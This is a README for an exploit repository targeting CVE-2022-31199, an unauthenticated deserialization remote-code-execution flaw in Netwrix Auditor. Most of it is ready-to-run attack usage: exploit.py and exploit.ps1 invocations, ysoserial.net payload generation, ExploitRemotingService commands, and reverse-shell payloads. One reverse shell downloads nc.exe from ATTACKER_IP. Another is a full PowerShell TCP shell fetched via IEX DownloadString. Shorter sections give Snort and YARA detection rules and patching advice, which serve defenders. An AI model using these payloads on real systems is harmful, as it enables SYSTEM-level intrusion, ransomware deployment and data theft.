# CVE-2022-31199 - Netwrix Auditor RCE Exploit POCs

## 🔍 Vulnerability Overview

**CVE-2022-31199** is a critical insecure object deserialization vulnerability in Netwrix Auditor versions prior to 10.5. The vulnerability exists in an unsecured .NET Remoting service listening on TCP port 9004, allowing unauthenticated remote attackers to achieve arbitrary code execution with NT AUTHORITY\SYSTEM privileges.

### Vulnerability Details

- **CVE ID**: CVE-2022-31199
- **CVSS Score**: 9.8 (Critical)
- **CWE**: CWE-502 (Deserialization of Untrusted Data)
- **Affected Versions**: Netwrix Auditor < 10.5
- **Attack Vector**: Network (Unauthenticated)
- **Privileges Required**: None
- **Impact**: Complete system compromise with SYSTEM privileges
- **CISA KEV**: Listed in Known Exploited Vulnerabilities Catalog

### Real-World Impact

This vulnerability has been actively exploited in the wild by:
- **Truebot malware** campaign (Russian-affiliated CL0P/TA505 ransomware operators)
- **Silence cybercriminal group**
- **FIN11** threat actors

Successful exploitation typically leads to:
- Full Active Directory domain compromise
- Lateral movement across monitored systems
- Data exfiltration
- Ransomware deployment

## 📦 Repository Contents

This Repo contains complete Proof of Concept (POC) exploits for CVE-2022-31199:

### Files

1. **`exploit.py`** - Python-based exploitation framework
2. **`exploit.ps1`** - PowerShell exploitation script
3. **`README.md`** - This documentation
4. **`manual-exploitation.md`** - Step-by-step manual exploitation guide

## 🛠️ Requirements

### Tools Required

#### Windows-based Exploitation (Recommended)
- **ysoserial.net** - .NET deserialization payload generator
  - Download: https://github.com/pwntester/ysoserial.net
  - Releases: https://github.com/pwntester/ysoserial.net/releases
  
- **ExploitRemotingService** - .NET Remoting exploitation tool
  - Download: https://github.com/tyranid/ExploitRemotingService
  - Alternative (enhanced): https://github.com/codewhitesec/ExploitRemotingService

#### Python Script Requirements
- Python 3.6 or higher
- Standard library only (no external dependencies for basic checks)
- Access to ysoserial.net and ExploitRemotingService executables

#### PowerShell Script Requirements
- PowerShell 5.1 or higher
- Windows operating system
- ysoserial.exe and ExploitRemotingService.exe in script directory

## 🚀 Quick Start

### 1. Check if Target is Vulnerable

#### Using Python:
```bash
python3 exploit.py --target 192.168.1.100 --check
```

#### Using PowerShell:
```powershell
.\exploit.ps1 -Target 192.168.1.100 -CheckOnly
```

### 2. Generate Payload

```bash
# Using ysoserial.net
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "whoami"
```

### 3. Execute Exploit

#### Python (with pre-generated payload):
```bash
python3 exploit.py --target 192.168.1.100 --payload [BASE64_PAYLOAD]
```

#### PowerShell (automatic):
```powershell
.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"
```

## 📖 Detailed Usage

### Python Exploit (`exploit.py`)

#### Basic Vulnerability Check
```bash
python3 exploit.py --target 10.10.10.100 --check
```

#### Full Exploitation with Custom Payload
```bash
# Step 1: Generate payload
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c whoami > C:\temp\output.txt"

# Step 2: Execute exploit
python3 exploit.py --target 10.10.10.100 --payload AAEAAAD....[base64_payload]
```

#### Advanced Options
```bash
# Custom port
python3 exploit.py --target 10.10.10.100 --port 9004 --check

# Custom endpoint
python3 exploit.py --target 10.10.10.100 --endpoint UAVRServer --check
```

#### Command Line Arguments
```
--target    : Target IP address or hostname (required)
--port      : Target port (default: 9004)
--endpoint  : .NET Remoting endpoint name (default: UAVRServer)
--check     : Only check vulnerability, don't exploit
--payload   : Base64 encoded payload from ysoserial.net
```

### PowerShell Exploit (`exploit.ps1`)

#### Vulnerability Check Only
```powershell
.\exploit.ps1 -Target 192.168.1.100 -CheckOnly
```

#### Execute Command
```powershell
# Simple command execution
.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

# Write output to file
.\exploit.ps1 -Target 192.168.1.100 -Command "cmd /c whoami > C:\temp\out.txt"

# Custom port
.\exploit.ps1 -Target 192.168.1.100 -Port 9004 -Command "hostname"
```

#### Parameters
```
-Target     : Target IP address or hostname (required)
-Port       : Target port (default: 9004)
-Command    : Command to execute on target (default: "whoami")
-CheckOnly  : Only check vulnerability, don't exploit
```

## 🎯 Exploitation Examples

### Example 1: Information Gathering
```bash
# Check system information
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c systeminfo > C:\temp\sysinfo.txt"
```

### Example 2: Reverse Shell

#### Setup listener:
```bash
nc -lvnp 4444
```

#### Generate payload:
```bash
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c curl http://ATTACKER_IP/nc.exe -o C:\temp\nc.exe; C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"
```

### Example 3: PowerShell Reverse Shell

#### Create reverse shell script (rev.ps1):
```powershell
$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()
```

#### Host the script:
```bash
python3 -m http.server 8000
```

#### Generate payload:
```bash
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8000/rev.ps1')"
```

### Example 4: Using ExploitRemotingService Directly

```bash
# Test connectivity
ExploitRemotingService.exe tcp://192.168.1.100:9004/UAVRServer ver

# Execute with lease mode (bypasses some protections)
ExploitRemotingService.exe -uselease tcp://192.168.1.100:9004/UAVRServer ls C:\

# Execute with object reference
ExploitRemotingService.exe -useobjref tcp://192.168.1.100:9004/UAVRServer exec "whoami"
```

## 🔬 Technical Details

### Vulnerability Root Cause

The vulnerability stems from:
1. **Unsecured .NET Remoting endpoint** on TCP port 9004
2. **BinaryFormatter deserialization** without proper type filtering
3. **UAVRServer service** accepting arbitrary serialized objects
4. **Service running with SYSTEM privileges** in typical deployments

### Exploitation Process

```
1. Attacker connects to TCP port 9004
2. Identifies .NET Remoting service (UAVRServer endpoint)
3. Generates malicious serialized payload using ysoserial.net
4. Sends payload via .NET Remoting protocol
5. Target deserializes object using BinaryFormatter
6. Gadget chain executes arbitrary code
7. Code runs with NT AUTHORITY\SYSTEM privileges
```

### Supported Gadget Chains

The following ysoserial.net gadgets work against this vulnerability:

- **TypeConfuseDelegate** (recommended)
- **ObjectDataProvider**
- **PSObject**
- **WindowsIdentity**
- **TextFormattingRunProperties**

### Network Protocol

```
.NET Remoting Protocol Structure:
┌─────────────────────────────────────┐
│ Preamble (8 bytes)                  │
│ 0x00 0x01 0x00 0x00 0x01 0x00 0x00 │
├─────────────────────────────────────┤
│ Headers                             │
├─────────────────────────────────────┤
│ URI (UAVRServer)                    │
├─────────────────────────────────────┤
│ Serialized Object (BinaryFormatter) │
└─────────────────────────────────────┘
```

## 🛡️ Detection

### Network Indicators

#### Snort/Suricata Rule
```
alert tcp any any -> any 9004 (
    msg:"CVE-2022-31199 Netwrix .NET Remoting Exploit Attempt"; 
    content:"|00 01 00 00 01 00 00 00|"; 
    depth:8; 
    content:"System.Runtime.Remoting"; 
    distance:0; 
    sid:1000001; 
    rev:1;
)
```

#### Indicators of Compromise (IOCs)
- Unexpected connections to TCP port 9004
- Large packets with .NET Remoting headers
- BinaryFormatter serialization signatures
- Process execution from UAVRServer.exe context

### Host-Based Detection

#### Check for vulnerable service:
```powershell
# Check if port 9004 is listening
netstat -ano | findstr :9004

# Identify process
tasklist /FI "PID eq [PID]"
```

#### Event Log Monitoring:
- Look for unusual process creation from UAVRServer.exe
- Monitor for SYSTEM-level command execution
- Check for network connections from audit service

### YARA Rule

```yara
rule CVE_2022_31199_Netwrix_Exploit {
    meta:
        description = "Detects CVE-2022-31199 exploitation attempt"
        author = "Security Researcher"
        date = "2024-11-17"
        severity = "critical"
        
    strings:
        $header = { 00 01 00 00 01 00 00 00 }
        $remoting1 = "System.Runtime.Remoting" ascii
        $remoting2 = "UAVRServer" ascii
        $remoting3 = "Netwrix" ascii
        $serialize = "BinaryFormatter" ascii
        $gadget1 = "TypeConfuseDelegate" ascii
        $gadget2 = "ObjectDataProvider" ascii
        
    condition:
        $header at 0 and 
        ($remoting1 or $remoting2 or $remoting3) and 
        $serialize and
        any of ($gadget*)
}
```

## 🔒 Mitigation

### Immediate Actions

1. **Update to Netwrix Auditor 10.5 or later**
   - Version 10.5.10936.0 (June 6, 2022) - Initial fix
   - Version 10.5.10977.0 (October 27, 2022) - Additional protections

2. **Network Segmentation**
   - Do NOT expose TCP port 9004 to untrusted networks
   - Place Netwrix Auditor behind firewall
   - Implement network access controls

3. **Monitoring**
   - Monitor for unusual connections to port 9004
   - Alert on process execution from UAVRServer.exe
   - Watch for SYSTEM-level command execution

### Verification

```powershell
# Check Netwrix Auditor version
Get-ItemProperty "HKLM:\Software\Netwrix\Auditor" | Select Version

# Check if port is exposed
Test-NetConnection -ComputerName localhost -Port 9004

# Verify firewall rules
Get-NetFirewallRule | Where-Object {$_.DisplayName -like "*Netwrix*"}
```

## 📚 References

### Official Advisories
- **Bishop Fox Advisory**: https://bishopfox.com/blog/netwrix-auditor-advisory
- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2022-31199
- **CISA KEV**: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- **Netwrix Statement**: https://www.netwrix.com/netwrix_statement_on_cve202231199.html

### Technical Resources
- **ysoserial.net**: https://github.com/pwntester/ysoserial.net
- **ExploitRemotingService**: https://github.com/tyranid/ExploitRemotingService
- **Code White Research**: https://code-white.com/blog/teaching-the-old-net-remoting-new-exploitation-tricks/
- **NCC Group**: https://www.nccgroup.com/us/research-blog/finding-and-exploiting-net-remoting-over-http-using-deserialisation/

### Threat Intelligence
- **Arctic Wolf Analysis**: https://arcticwolf.com/resources/blog/cve-2022-31199/
- **NopSec Bulletin**: https://www.nopsec.com/resources/just-in-time/just-in-time-bulletin-cve-2022-31199-netwrix-insecure-object-deserialization-rce/

## ⚠️ Legal Disclaimer

```
IMPORTANT: These Proof of Concept (POC) exploits are provided for:
- Educational purposes
- Authorized security testing
- Vulnerability research
- Defensive security operations

UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL.

By using these tools, you agree to:
1. Only test systems you own or have explicit written permission to test
2. Comply with all applicable local, state, and federal laws
3. Use the tools responsibly and ethically
4. Not use for malicious purposes

The author(s) assume no liability for misuse of these tools.
Use at your own risk.
```

## 🤝 Contributing

Found an issue or improvement? Feel free to:
- Open an issue on the related repository
- Submit improvements or additional techniques
- Share detection signatures

## 📝 Credits

- **Bishop Fox** - Original vulnerability discovery and disclosure
- **James Forshaw** - ExploitRemotingService framework
- **Alvaro Munoz** - ysoserial.net development
- **ProjectDiscovery** - Nuclei template framework

## 📅 Timeline

- **June 6, 2022** - Netwrix releases version 10.5 with fix
- **July 2022** - Bishop Fox publishes advisory
- **October 27, 2022** - Additional patches released (version 10.5.10977.0)
- **May 2023** - Active exploitation observed (Truebot campaign)
- **July 11, 2023** - Added to CISA KEV catalog
- **November 2024** - POCs released for defensive research

---

**Version**: 1.0  
**Last Updated**: November 17, 2024  
**Maintained by**: Security Research Community

For questions or issues, please refer to the official advisories and documentation.
